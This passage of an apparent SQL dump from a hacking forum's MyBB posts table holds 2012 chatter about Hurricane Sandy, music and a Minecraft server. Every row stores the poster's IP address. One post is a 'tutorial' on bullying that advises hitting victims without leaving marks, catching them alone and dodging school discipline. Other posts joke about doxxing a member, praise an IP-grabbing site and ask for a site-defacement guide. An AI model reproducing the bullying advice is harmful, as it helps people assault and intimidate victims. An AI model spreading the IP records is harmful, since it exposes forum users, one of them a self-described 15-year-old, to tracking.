'XxTREYZxX', '1351559324', 'Yeah now it will be a living ipod :O', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'f1f48deb763561b9c2918dcf0dbd2e69', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6652', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351559517', 'Yeah true just wait-en cause i will defiantly play it :P', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'ae410c75efd0f15fe3f17693f56b73d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6653', '1138', '6649', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '8', 'spacefish36', '1351559723', '[quote=\'iTzIpod\' pid=\'6649\' dateline=\'1351558221\'] I\'m really curious on what will it be tonight and tomorrow. :o I find that reading this guy\'s tweets on Twitter is actually quite amusing. :p @SandysHurricane :p [/quote] That guys useless. i\'m going to update.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '06525002d66e93374aa34f27e1aabb2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6654', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '82', 'iTzIpod', '1351560347', 'Stop talking about me! :( Nah I joke. Fix the MyCode in your OP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d6c9c407aa959a8531b5881fc71f831', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6655', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '82', 'iTzIpod', '1351560385', 'I know he\'s useless. Kinda funny reading his tweets though. (In my Opinion)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cd3a0c30ed1c00c9f28f41d4871cedaa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6656', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351560426', 'You can make your own server right now. And yeah. It would be fun. :) I can help moderate it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2f0813926a9be3d65b53ba44042d821', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6657', '1139', '0', '83', '[tutorial] How to bully and get away in US', '0', '4', 'Triple H', '1351562475', 'When you bully someone it\'s most likely you are bullying a weak person and you are a pussy to fight a real man so you would most llikely get suspended if the person snitches on you. Now no matter how much you bully and even if you disagree to the fact that you did bully you would still get suspended but if you say you don\'t care you get suspended etc and you didn\'t do anything to the victim then you can be safe because if the suspension is not going to work then there\'s no use of suspending someone. The concept of being suspended is to give them a lesson but if they don\'t care then it\'s useless. I would recommend you to stop bullying then but if you do bully and get reported again and there are no witnesses then nothing is going to happen to you. If you get called in say that you already got called in for troubling him when you didn\'t even touch him at all so why would you bother him again. Now since there\'s no action going to be taken, according to the US board of education the victim has to get trasnferred to another school. Nothing happens to the bully. [b]Out side of school[/b] You might get into fights outside of the school for bullying but if someone snitches on you then it means that they don\'t want to fight or get into trouble so they won\'t do anything but they can get you beaten up but their friends so watch around for people that stalking you. [b]Tips[/b] - Don\'t hit so hard that it would leave a mark or else you can get sued/arrested over assault. - Jump your victim alone so none of your friends can backstab you. - Act normal infront of the victim and act like you are avoiding them. - If you are guy then when the victim crosses by you, make sure that you are with a girl to make him jealous. READ THIS TUTORIAL ON SE\'ING YOUR TEACHERS http://l33thacking.net/thread-19.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ed5bf89a8ca08387b682c2bcddaab283', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6658', '1138', '6655', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '8', 'spacefish36', '1351565592', '[quote=\'iTzIpod\' pid=\'6655\' dateline=\'1351560385\'] I know he\'s useless. Kinda funny reading his tweets though. (In my Opinion) [/quote] Lol he will die soon.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '389a7e92e0ca531b1130190b12bf23b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6659', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '257', 'XxTREYZxX', '1351573428', 'Thanks for the great work will try this. ahah', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '89a9f3f9a578942e30901c949a5a8ebc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6660', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351573502', 'Sorry but setting up another server is just too much of a pain, maybe later', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'd056e935c1f669535f83f3fd1ba6bd9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6661', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '257', 'XxTREYZxX', '1351573610', 'ahah yeah we always talk about you in this thread ahah', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '95dd6917c575883a2c8197f6c6c31ac0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6662', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '228', 'VirtualLegend', '1351582721', 'I\'m lucky that i live in Europe xD', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'bb30163bc84ecc1359ca0c492b69f685', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6663', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '228', 'VirtualLegend', '1351582831', 'When you have time just contact me', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '0dac008ee9c37b915b84de82ed0a6f06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6664', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '302', 'Mac Miller', '1351588376', '10/10 Totidile was teh ish back when i watched the show.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'ad28651d56cbfc329d075b4f11a354ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6665', '1139', '6657', '83', 'RE: [tutorial] How to bully and get away in US', '0', '302', 'Mac Miller', '1351588980', 'Lol thanks for the guide only time I bully is when someone pisses me off or tries to buck up to a woman. But Bullying for no reason to me makes no sense.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '3158230b0f6406dfde9b157abb59daa9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6666', '1139', '6657', '83', 'RE: [tutorial] How to bully and get away in US', '0', '258', 'PiXEL^OG', '1351590319', 'You and this tutorial make me sick..', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '0a7d8a0def26cf1e4cc54812cf3c8183', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6667', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '205', 'mothered', '1351597322', 'I watched Taken 2 with Liam Neeson. I liked the first one better, but this one\'s good too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '52a4346ab994f4f318e64c21195086c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6668', '1139', '6666', '83', 'RE: [tutorial] How to bully and get away in US', '0', '302', 'Mac Miller', '1351598950', '[quote=\'PiXEL^OG\' pid=\'6666\' dateline=\'1351590319\'] You and this tutorial make me sick.. [/quote] lol why would you say that?', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'ee6cf5c7a0f4c1ee6107742432fe528e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6669', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '302', 'Mac Miller', '1351599006', 'This song sucks the beat makes me sick it\'s just not good at all.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'dd90d4ce894183f716cd26ee2ff4ddef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6670', '1140', '0', '8', 'Who likes OFWGKTA?', '0', '302', 'Mac Miller', '1351599108', '[align=center]They are awesome who else likes them here are some songs i like by them. [video=youtube]http://www.youtube.com/watch?v=iGk17GBHfiM[/video] [video=youtube]http://www.youtube.com/watch?v=nQUsCNEL2Y4[/video][/align]', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '560f72fa5e5698df202166bbe62666f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6671', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '302', 'Mac Miller', '1351599204', 'Idk i have it on some computers already i love it but im not gonna upgrade all my computers though.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'a4c5dcbba55a2049b1937a9643b06288', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6672', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '2', 'Apathy', '1351599528', 'Or study and not possibly get a zero?', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '8c8ad7bd0f16a291dbd86f37573c0413', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6673', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '302', 'Mac Miller', '1351599788', 'Thanks for the warm welcome I\'m loving it here!!!', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'a8a9ff50fe78d62658fbc30b076cdd34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6674', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '302', 'Mac Miller', '1351608864', 'This is amazing to bad i don\'t care if people know my stuff.', '208.67.117.50', '-800885454', '0', '0', '302', '1351608918', '1', '5cc7e556b106a882786682dabddaef44', '0', '1351608918'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6675', '1141', '0', '4', 'Hi, I`m CommandoModz', '0', '306', 'CommandoModz', '1351613410', 'Hi! I`m CommandoModz. I`m 15 and live in Florida. I like to mod, play online, etc. If you need to know anything else, ask! :angel:', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '23db2a49f8219d14126bff326fc57503', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6676', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '228', 'VirtualLegend', '1351613842', 'Welcome CommandoModz To Da best forum Evar :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7bdd20765fd2b7e3af712f35d88d4fd4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6677', '75', '4881', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '306', 'CommandoModz', '1351613885', '[quote=\'??zg???g????61\' pid=\'4881\' dateline=\'1350394571\'] [quote=\'mothered\' pid=\'4876\' dateline=\'1350390084\'] I usually use this: http://whatstheirip.com/ That said, nice Guides here mate. Good job. [/quote] Same here, ^^ [/quote] Haha, this method is a lot simpler than the above ones but they all still work greatly.! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '2adf0a2194962c288febedafec90a3c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6678', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '306', 'CommandoModz', '1351613963', 'You should make a tutorial on how to deface someones site! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '929fca8909b1dbdfac70e5c88c8d3a5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6679', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '53', 'sirchamp', '1351615147', 'Luckily it hasn\'t reached Switzerland yet.', '120.91.1.228', '2019230180', '1', '0', '0', '0', '1', '5c83099f5dd70e589d2e328a470611c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6680', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '228', 'VirtualLegend', '1351617891', '50 cent: All things fall apart Awesome movie', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1e75801ab272edc900810622fa4a94b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6681', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '1', 't3h jok3r', '1351620186', 'Hi Commando, Welcome to L33T Hacking. Thanks for signing up and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f9b14469453236cd3f823a4c21368095', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6682', '1138', '6662', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '1', 't3h jok3r', '1351620267', '[quote=\'VirtualLegend\' pid=\'6662\' dateline=\'1351582721\'] I\'m lucky that i live in Europe xD [/quote] God forbid but anything can happen in Europe too :P', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '642c8ea3a8afc5225936b785524851b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6683', '656', '6679', '8', 'RE: why do ppl like this shitty song!?!?', '0', '1', 't3h jok3r', '1351620443', '[quote=\'sirchamp\' pid=\'6679\' dateline=\'1351615147\'] Luckily it hasn\'t reached Switzerland yet. [/quote] Switzerland? **Writes it down on my notepad saved as d0x of sirch@mp** OT: It honestly depends on people and mostly people listen to it to fit in with others to pretend to be cool and shit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6949ae0791fb5658eef8e4d4095a6c8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6684', '1142', '0', '24', 'Fuck you Internet Explorer', '0', '1', 't3h jok3r', '1351620728', 'As some of you know that I had my PC replaced, I \"luckily\" got a used PC that was infected with a virus so now I can\'t download the latest versions of anything which includes chrome, skype(I\'m using the very first version of skype), any VPNs etc. The funny thing is that I got the latest version of internet explorer but it OD sucks. I can\'t copy links easily, etc. I hate it. Post your opinions on IE.', '72.231.24.165', '1223104677', '1', '0', '1', '1351623367', '1', 'b688e8b03d764f102d1d90c924201861', '0', '1351623367'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6685', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '53', 'sirchamp', '1351623141', 'Doesnt this site log ip adresses?', '69.50.130.198', '1160938182', '1', '0', '0', '0', '1', '561ed36b8e92c902177be4137cd3aff8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6686', '656', '6685', '8', 'RE: why do ppl like this shitty song!?!?', '0', '1', 't3h jok3r', '1351623460', '[quote=\'sirchamp\' pid=\'6685\' dateline=\'1351623141\'] Doesnt this site log ip adresses? [/quote] Uhh you got me. Are you seriously from switzerland?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cc59eecba3bc3799cb0492c03ff7c145', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6687', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351624837', 'If I have time, I\'ll contact you then! ;D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00176dbf4c2bba175f9b240c75bc698c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6688', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351624893', '?/10 I don\'t know who that is.. :p I also don\'t really like listening to Mac Miller. :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7055c0197654773bac7cace4d4479991', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6689', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '82', 'iTzIpod', '1351624926', 'I heard about them once. Still don\'t know who they are. I don\'t like them or like them either or.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '493d241c2deb0a9f34ac04d8085a8f0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6690', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '82', 'iTzIpod', '1351625175', 'Welcome to L33tHacking. Enjoy your stay. I am iTzIpod a very trustworthy and loyal member. If you need any help, or, any questions or concerns, don\'t hesitate to PM me or so. Please read the rules and abide to them. :) Thanks.', '24.212.197.164', '416597412', '1', '0', '82', '1351634994', '1', '30ab7733d62a9ef659ff91b7d795af2d', '0', '1351634994'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6691', '1142', '6684', '24', 'RE: Fuck you Internet Explorer', '0', '82', 'iTzIpod', '1351625260', 'It\'s slower than a fat man running on a hot sunny day. :o Internet Explorer sucks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1198ab58bba3d4a1cfd8076e67192555', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6692', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '67', 'HoverCatz', '1351627356', '10/10 Awesome cap of pokemon', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '70e810e51e2679392ccb500ba90e2681', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6693', '1141', '6690', '4', 'RE: Hi, I`m CommandoModz', '0', '1', 't3h jok3r', '1351630330', '[quote=\'iTzIpod\' pid=\'6690\' dateline=\'1351625175\'] Welcome to L33tHacking. Enjoy your stay. I am iTzIpod a very trustworthy and loyal member. If you have any help, don\'t hesitate to PM me or so. Please read the rules and abide to them. :) Thanks. [/quote] If he has help then why would he ask? Umm call a doctor.', '72.231.24.165', '1223104677', '1', '0', '1', '1351630345', '1', '47588a0b3a5cd6e38a9c7858574c75d9', '0', '1351630345'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6694', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '61', 'NXK', '1351631515', '[video=youtube]http://www.youtube.com/watch?v=7qWyns2GnxU[/video]I like a couple of there songs, I like frank ocean alot, he\'s my fav member for sure.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'daa25bd9527dc1194ad80899de3f6f45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6695', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '232', 'BreShiE', '1351631985', 'I\'ve never actually listening to the whole group over a song I think, I\'ve only heard Tyler The Creator, and he\'s quite a good lyricist.', '78.149.58.68', '1318402628', '1', '0', '0', '0', '1', 'a2766d5f8eb8743e12d84c708866f514', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6696', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351634088', '10/10 Really orignal have never seen it in any forums :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a3b1deee5c7942567daee12f8793b9e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6697', '1138', '6682', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '228', 'VirtualLegend', '1351634192', '[quote=\'t3h jok3r\' pid=\'6682\' dateline=\'1351620267\'] [quote=\'VirtualLegend\' pid=\'6662\' dateline=\'1351582721\'] I\'m lucky that i live in Europe xD [/quote] God forbid but anything can happen in Europe too :P [/quote] I Don\'t think so Netherlands is really specialized in hurricanes', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c0702c28e827bc881d7c5cd4da12e447', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6698', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '82', 'iTzIpod', '1351634959', 'I meant to say need :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 